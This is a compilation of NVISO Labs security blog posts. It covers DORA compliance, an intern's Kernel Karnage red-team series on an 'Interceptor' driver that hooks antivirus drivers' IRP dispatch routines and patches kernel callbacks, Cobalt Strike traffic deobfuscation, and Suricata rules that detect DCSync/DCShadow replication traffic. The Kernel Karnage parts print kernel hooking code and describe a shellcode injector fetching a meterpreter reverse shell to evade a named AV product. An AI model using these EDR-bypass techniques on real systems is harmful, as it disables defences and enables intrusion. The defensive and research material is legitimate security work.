What do we consider as potential challenges for most organizations?

While, many organisations already have such agreements in place, such challenges might still emerge as: 

  • How will you determine what information to share? There should be a balance between helping the community and ensuring alignment with laws and regulations, as well as not sharing sensitive information with competition
  • How will you share this information efficiently?
  • What processes will you set up to consume the shared information by other entities?

Preparing yourself

In order to be ready, we recommend organisations take the following steps in 2021 and 2022:

  • Conduct a maturity assessment against the DORA requirements and define a mitigation plan to reach compliance.
  • Start consolidating the register of information for all ICT third-party providers.
  • Start defining a potential scenario for the large-scale penetration test.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering. 

Find out more about Nicolas on Linkedin.

✇ NVISO Labs

Kernel Karnage – Part 4 (Inter(ceptor)mezzo)

By: bautersj

To make up for the long wait between parts 2 and 3, we’re releasing another blog post this week. Part 4 is a bit smaller than the others, an intermezzo between parts 3 and 5 if you will, discussing interceptor.

1. RTFM & W(rite)TFM!

The past few weeks I spent a lot of time getting acquainted with the windows kernel and the inner workings of certain EDR/AV products. I also covered the two main methods of attacking the EDR/AV drivers, namely kernel callback patching and IRP MajorFunction hooking. I’ve been working on my own driver called Interceptor, which will implement both these techniques as well as a method to load itself into kernel memory, bypassing Driver Signing Enforcement (DSE).

I’m of the opinion that when writing tools or exploits, the author should know exactly what each part of his/her/their code is responsible for, how it works and avoid copy pasting code from similar projects without fully understanding it. With that said, I’m writing Interceptor based on numerous other projects, so I’m taking my time to go through their associated blogposts and understand their working and purpose.

Interceptor currently supports IRP hooking/unhooking drivers by name or by index based on loaded modules.

Using the -l option, Interceptor will list all the currently loaded modules on the system and assign them an index. This index can be used to hook the module with the -h option.

Using the -lh option, Interceptor will list all the currently hooked modules with their corresponding index in the global hooked drivers array. Interceptor currently supports hooking up to 64 drivers. The index can be used with the -u option to unhook the module.

Interceptor list hooked drivers

Once a module is hooked, Interceptor’s InterceptGenericDispatch() function will be called whenever an IRP is received. The current function notifies a call was intercepted via a debug message and then call the original completion routine. I’m currently working on a method to inspect and modify the IRPs before passing them to their completion routine.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

I’m also working on a module that supports patching kernel callbacks. The difficulty here is locating the different callback arrays by enumerating their calling functions and looking for certain opcode patterns, which change between different versions of Windows.

As mentioned in one of my previous blogposts, locating the callback arrays for PsSetCreateprocessNotifyRoutine() and PsSetCreateThreadNotifyRoutine() is done by looking for a CALL instruction to PspSetCreateProcessNotifyRoutine() and PspSetCreateThreadNotifyRoutine() respectively, followed by looking for a LEA instruction.

Finding the callback array for PsSetLoadImageNotifyRoutine() is slightly different as the function first jumps to PsSetLoadImageNotifyRoutineEx(). Next, we skip looking for the CALL instruction and go straight for the LEA instruction instead, which puts the callback array address into RCX.

LoadImage callback array

Interceptor’s callback module currently implements patching functionality for Process and Thread callbacks.

The registered callbacks on the system and their patch status can be listed using the -lc command.

2. Conclusion

In the previous blogpost of this series, we combined the functionality of two drivers, Evilcli and Interceptor, to partially bypass $vendor2. In this post we took a closer look at Interceptor’s capabilities and future features that are in development. In the upcoming blogposts, we’ll see how Interceptor as a fully standalone driver is able to conquer not just $vendor2, but other EDR products as well.

References

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Cobalt Strike: Decrypting Obfuscated Traffic – Part 4

By: Didier Stevens

Encrypted Cobalt Strike C2 traffic can be obfuscated with malleable C2 data transforms. We show how to deobfuscate such traffic.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. And in part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

In the first 3 parts of this series, we have always looked at traffic that contains the unaltered, encrypted data: the data returned for a query and the data posted, was just the encrypted data.

This encrypted data can be transformed into traffic that looks more benign, using malleable C2 data transforms. In the example we will look at in this blog post, the encrypted data is hidden inside JavaScript code.

But how do we know if a beacon is using such instructions to obfuscate traffic, or not? This can be seen in the analysis results of the latest version of tool 1768.py. Let’s take a look at the configuration of the beacon we started with in part 1:

Figure 1: beacon with default malleable C2 instructions

We see for field 0x000b (malleable C2 instructions) that there is just one instruction: Print. This is the default, and it means that the encrypted data is received as-is by the beacon: it does not need any transformation prior to decryption.

And for field 0x000d (http post header), we see that the Build Output is also just one instruction: Print. This is the default, and it means that the encrypted data is transmitted as-is by the beacon: it does not need any transformation after encryption.

Let’s take a look at a sample with custom malleable C2 data transforms:

Figure 2: beacon with custom malleable C2 instructions

Here we see more than just a Print instruction: “Remove 1522 bytes from end”, “Remove 84 bytes from begin”, …

These are instructions to transform (deobfuscate) the incoming traffic, so that it can then be decrypted. To understand in detail how this works, we will do the transformation manually with CyberChef. However, do know that tool cs-parse-http-traffic.py can do these transformations automatically.

This is the network capture for a single GET request by the beacon and reply from the team server (C2):

Figure 3: reply transformed with malleable C2 instructions to look like JavaScript code

What we see here, is a GET request by the beacon to the C2 (notice the Cookie with the encrypted metadata) and the reply by the C2. This reply looks like JavaScript code, because of the malleable C2 data transforms that have been used to make it look like JavaScript code.

We copy this reply over to CyberChef in its input field:

Figure 4: CyberChef with obfuscated input

The instructions we need to follow, to deobfuscate this reply, are listed in tool 1768.py’s output:

Figure 5: decoding instructions

So let’s get started. First we need to remove 1522 bytes from the end of the reply. This can be done with a CyberChef drop bytes function and a negative length (negative length means dropping from the end):

Figure 6: dropping 1522 bytes from the end

Then, we need to remove 84 bytes from the beginning of the reply:

Figure 7: dropping 84 bytes from the beginning

And then also dropping 3931 bytes from the beginning:

Figure 8: dropping 3931 bytes from the beginning

And now we end up with output that looks like BASE64 encoded data. Indeed, the next instruction is to apply a BASE64 decoding instructions (to be precise: BASE64 encoding for URLs):

Figure 9: decoding BASE64/URL data

The next instruction is to XOR the data. To do that we need the XOR key. The malleable C2 instruction to XOR, uses a 4-byte long random key, that is prepended to the XORed data. So to recover this key, we convert the binary output to hexadecimal:

Figure 10: hexadecimal representation of the transformed data

The first 4 bytes are the XOR key: b7 85 71 17

We use that with CyberChef’s XOR command:

Figure 11: XORed data

Notice that the first 4 bytes are NULL bytes now: that is as expected, XORing bytes with themselves gives NULL bytes.

And finally, we drop these 4 NULL bytes:

Figure 12: fully transformed data

What we end up with, is the encrypted data that contains the C2 commands to be executed by the beacon. This is the result of deobfuscating the data by following the malleable C2 data transform. Now we can proceed with the decryption using a process memory dump, just like we did in part 3.

Figure 13: extracting the cryptographic keys from process memory

Tool cs-extract-key.py is used to extract the AES and HMAC key from process memory: it fails, it is not able to find the keys in process memory.

One possible explanation that the keys can not be found, is that process memory is encoded. Cobalt Strike supports a feature for beacons, called a sleep mask. When this feature is enabled, the process memory with data of a beacon (including the keys) is XOR-encoded while a beacon sleeps. Thus only when a beacon is active (communicating or executing commands) will its data be in cleartext.

We can try to decode this process memory dump. Tool cs-analyze-processdump.py is a tool that tries to decode a process memory dump of a beacon that has an active sleep mask feature. Let’s run it on our process memory dump:

Figure 14: analyzing the process memory dump (screenshot 1)
Figure 15: analyzing the process memory dump (screenshot 2)

The tool has indeed found a 13-byte long XOR key, and written the decoded section to disk as a file with extension .bin.

This file can now be used with cs-extract-key.py, it’s exactly the same command as before, but with the decoded section in stead of the encoded .dmp file:

Figure 16: extracting keys from the decoded section

And now we have recovered the cryptographic keys.

Notice that in figure 16, the tool reports finding string sha256\x00, while in the first command (figure 13), this string is not found. The absence of this string is often a good indicator that the beacon uses a sleep mask, and that tool cs-analyze-processdump.py should be used prior to extracting the keys.

Now that we have the keys, we can decrypt the network traffic with tool cs-parse-http-traffic.py:

Figure 17: decrypting the traffic fails

This fails: the reason is the malleable C2 data transform. Tool cs-parse-http-traffic.py needs to know which instructions to apply to deobfuscate the traffic prior to decryption. Just like we did manually with CyberChef, tool cs-parse-http-traffic.py needs to do this automatically. This can be done with option -t.

Notice that the output of tool 1768.py contains a short-hand notation of the instructions to execute (between square brackets):

Figure 18: short-hand notations of malleable C2 instructions

For the tasks to be executed (input), it is:

7:Input,4,1:1522,2:84,2:3931,13,15

And for the results to be posted (output), it is:

7:Output,15,13,4

These instructions can be put together (using a semicolon as separator) and fed via option -t to tool cs-parse-http-traffic.py:

Figure 19: decrypted traffic

And now we finally obtain decrypted traffic. There are no actual commands here in this traffic, just “data jitter”: that is random data of random length, designed to even more obfuscate traffic.

Conclusion

We saw how malleable C2 data transforms are used to obfuscate network traffic, and how we can deobfuscate this network traffic by following the instructions.

We did this manually with CyberChef, but that is of course not practical (we did this to illustrate the concept). To obtain the decoded, encrypted commands, we can also use cs-parse-http-traffic.py. Just like we did in part 3, where we started with an unknown key, we do this here too. The only difference, is that we also need to provide the decoding instructions:

Figure 20: extracting and decoding the encrypted data

And then we can take one of these 3 encrypted data, to recover the keys.

Thus the procedure is exactly the same as explained in part 3, except that option -t must be used to include the malleable C2 data transforms.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Kernel Karnage – Part 3 (Challenge Accepted)

By: bautersj

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
		}
	}
	NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Detecting DCSync and DCShadow Network Traffic

By: Didier Stevens

This blog post on detecting Mimikatz’ DCSync and DCShadow network traffic, accompanies SANS webinar “Detecting DCSync and DCShadow Network Traffic“.

Intro

Mimikatz provides two commands to interact with a Windows Domain Controller and extract or alter data from the Active Directory database.

These two commands are dcsync and dcshadow.

The dcsync command can be used, on any Windows machine, to connect to a domain controller and read data from AD, like dumping all credentials. This is not an exploit or privilege escalation, the necessary credentials are required to be able to do this, for example a golden ticket.

The dcshadow command can be used, on any Windows machine, to connect to a domain controller and write data to AD, like changing a password or adding a user. This too is not an exploit or privilege escalation: proper domain admin credentials are necessary to achieve this.

Both commands rely on the active directory data replication protocol: Directory Replication Service (DRS). This is a protocol (MSRPC / DCE/RPC based) that domain controllers use to replicate their AD database changes between them. The Microsoft API for DRS is DRSUAPI.

Such traffic should only occur between domain controllers. When DRS traffic is detected between a DC and a non-DC (a user workstation for example), alarms should go of.

Alerting

An Intrusion Detection System can detect DRSUAPI traffic with proper rules.

Figure 1: IDS inspecting traffic between workstation and DC

The IDS needs to be positioned inside the network, at a location where traffic between domain controllers and non-domain controllers can be inspected.

DCE/RPC traffic is complex to parse properly. For example, remote procedure calls are done with an integer that identifies the procedure to call. The name of the function, represented as a string for example, is not used in the DCE/RPC protocol. Furthermore, function integers are only unique within an API: for example, function 0 is the DsBind function in the DRSUAPI function, but function 0 is also the DSAPrepareScript in the DSAOP interface.

A very abstract view of such traffic, can be represented like this:

Figure 2: abstraction of DCE/RPC traffic

If an IDS would just see or inspect packet B, it would not be able to determine which function is called. Sure, it is function 0, but for which API? Is it DsBind in the DRSUAPI API or is is DSAPrepareScript in the DSAOP interface? Or another one …

So, the IDS needs to keep track of the interfaces that are requested, and then it can correctly determine which functions are requested.

Alerting dcsync

Here is captured dcsync network traffic, visualized with Wireshark (dcerpc display filter):

Figure 3: DCSync network traffic

Frame 28 is our packet A: requesting the DRSUAPI interface

Frame 41 is our packet B: requesting function DsGetNCChanges

Notice that these packets do belong to the same TCP connection (stream 4).

Thus, a rule would be required, that triggers on two different packets. This is not possible in Snort/Suricata: simple rules inspect only one packet.

What is typically done in Suricata for such cases, is to make two rules: one for packet A and one for packet B. And an alert is only generated when rule B triggers after rule A triggers.

This can be done with a flowbit. A flowbit is literally a bit kept in memory by Suricata, that can be set or cleared.

These bits are linked to a flow. Simply put, a flow is a set of packets between the same client and server. It’s more generic than a connection.

Thus, what needs to be done to detect dcsync traffic using a flowbit, is to have two rules:

  1. Rule 1: detect packet of type A and set flowbit
  2. Rule 2: detect packet of type B and alert if flowbit is set

Suricata rules that implement such a detection, look like this:

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI"; 
flow:established,to_server; 
content:"|05 00 0b|"; depth:3; 
content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; 
flowbits:set,drsuapi; 
flowbits:noalert; 
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000010; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI DsGetNCChanges Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|03 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000011; rev:1;)

The first rule (Mimikatz DRSUAPI) is designed to identify a DCERPC Bind to the DRSUAPI API. The packet data has to start with 05 00 0B:

Figure 4: DCERPC packet header

5 is the major version of the protocol, 0 is the minor version, and 0B (11 decimal) is a Bind request.

A UUID is used to identify the DRSUAPI interface (this is not done with a string like DRSUAPI, but with a UUID that uniquely identifies the DRSUAPI interface):

Figure 5: DRSUAPI UUID

The UUID for DRSUAPI is

e3514235-4b06-11d1-ab04-00c04fc2dcd2

In network packet format, it is

35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2.

When both content clauses are true, the rule triggers. The action that is triggered, is setting a flowbit named drsuapi:

flowbits:set,drsuapi;

A second action, is to prevent the rule from generating an alert when setting this flowbit:

flowbits:noalert;

This explains the first rule.

The second rule (Mimikatz DRSUAPI DsGetNCChanges Request) is designed to detect packets with a DRSUAPI request for function DsGetNCChanges. The packet data has to start with 05 00 00:

Figure 6: DRSUAPI Request

5 is the major version of the protocol, 0 is the minor version, and 00 is an RPC request.

And further down in the packet data (position 22 to be precise) the number of the function is specified:

Figure 6: DRSUAPI DsGetNCChanges

Number 3 is DRSUAPI function DsGetNCChanges.

When flowbit drsuapi is set and both content clauses are true, the rule triggers.

flowbits:isset,drsuapi;

And an alert is generated.

Notice that the rule names contain the word Mimikatz, but these rules are not specific to Mimikatz: they will also trigger on regular replication traffic between DCs. The key to use these rules properly, is to make them inspect network traffic between domain controllers and non-domain controllers. Replication traffic should only occur between DCs.

Alerting dcshadow

Mimikatz dcshadow command also generates DRSUAPI network traffic, and the rules defined for dcsync also trigger on dcshadow traffic.

One lab in SANS training SEC599, Defeating Advanced Adversaries – Purple Team Tactics & Kill Chain Defenses, covers dcsync and its network traffic detection. If you take this training, you can also try out dcshadow in this lab.

The dcshadow command requires two instances of Mimikatz to run. First, one running as system to setup the RPC server:

Figure 7: first instance of Mimikatz for dcshadow (screenshot a)
Figure 8: first instance of Mimikatz for dcshadow (screenshot b)

And a second one running as domain admin to start the replication:

Figure 9: second instance of Mimikatz for dcshadow

This push instruction starts the replication:

Figure 10: second instance of Mimikatz for dcshadow (screenshot b)

dcshadow network traffic looks like this in Wireshark (dcerpc display filter):

Figure 11: dcshadow network traffic

Notice the DRSUAPI bind requests and the DsGetNCChanges requests -> these will trigger the dcsync rules.

DRSUAPI_REPLICA_ADD is also an interesting function to detect: it adds a replication source. The integer that identifies this function is 5.

Figure 12: DRSUAPI_REPLICA_ADD

A rule to detect this function can be created based on the rule to detect DsGetNCChanges.

What needs to be changed:

  1. The opnum: 03 00 -> 05 00
  2. The rule number, sid:1000011 -> sid:1000014 (for example)
  3. And the rule message (preferably): “Mimikatz DRSUAPI DsGetNCChanges Request” -> “Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request”
alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|05 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000014; rev:1;)

More generic rules

It is also possible to change the flowbit setting rule (rule for packet A), to generate alerts. This is done by removing the following clause:

flowbits:noalert;

Alerts are generated whenever the DRSUAPI interface is bound to, regardless of which function is called.

And a generic rule for a DRSUAPI function call can also be created, by removing the following clause from the DsGetNCChanges rule (for example):

content:”|03 00|”; offset:22; depth:2;

Byte order and DCEPRC

DCERPC is a flexible protocol, that allows different byte orders. A byte order, is the order in which bytes are transmitted over the network. When dealing with integers that are encoded using more than one byte, for example, different orders are possible.

The opnum detected in the dcsync rule, is 3. This integer is encoded with 2 bytes: a most significant byte (00) and a least significant byte (03).

When the byte order is little-endian, the least significant byte (03) is transmitted first, followed by the most significant byte (00). This is what is present in the captured network traffic.

But when the byte order is big-endian, the most significant byte (00) is transmitted first, followed by the least significant byte (03).

And thus, the rules would not trigger for big-endian byte-order.

The byte order is specified by the client in the data representation bytes of the DCERPC packet data:

Figure 13: DCERPC data representation

If the first nibble of the first byte of the data representation is one, the byte order is little-endian.

Big-endian is encoded with nibble value zero.

We have developed rules that check the byte-order, and match the opnum value accordingly:

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|03 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000012; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 03|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000013; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|05 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000015; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 05|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000016; rev:1;)

Notice that Suricata and Snort can also be configured to enable the dcerpc preprocessor. This allows for the creation of rules that don’t have to take implementation details into account, like byte-order:

alert dcerpc $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; dce_iface:e3514235-4b06-11d1-ab04-00c04fc2dcd2; dce_opnum:3; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000017; rev:1;)

But such rules can have a significantly higher performance impact, because of the extra processing performed by the dcerpc preprocessor.

Conclusion

In this blog post we show how to detect Active Directory replication network traffic. Such traffic is normal between domain controllers, but it should not be detected between a non-domain controller (like a workstation or a member server) and a domain controller. The presence of unexpected DRS traffic, is a strong indication of an ongoing Active Directory attack, like Mimikatz’ DCSync or DCShadow.

The rules we start with operate at a low network layer level (TCP data), but we show how to develop rules at a higher level, that are more versatile and require less attention to implementation details.

Finally, the rules presented in this blog post are alerting rules for a detection system. But they can easily be modified into blocking rules for a prevention system, by replacing the alert action by a drop or reject action.

All the rules presented here can also be found on our IDS rules Github repository.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Another spin to Gamification: how we used Gather.town to build a (great!) Cyber Security Game

By: smadessis
CSI Game hosted on Gather.town platform

Let’s recap October. Cyber Security Awareness Month. For a cyber awareness enthusiast, it is hard to conceal the excitement that comes with a full month of initiatives in all shapes and sizes, built around a genuine and strong effort to help keep companies and their people “safe online”. At NVISO also, the buzz is tangible, and everyone is eager to know what great projects we will be launching for this year’s Cyber Security Awareness Month. We’re lucky enough to have a client who will go the extra mile and allowed us to let our imagination run wild. And that is exactly what we did.

Let’s make it: “a game”

Our assignment was simple, yet challenging:

  • Define a scenario that fits a “Security at Home” context, where we connect our security tips to a “working from home” context
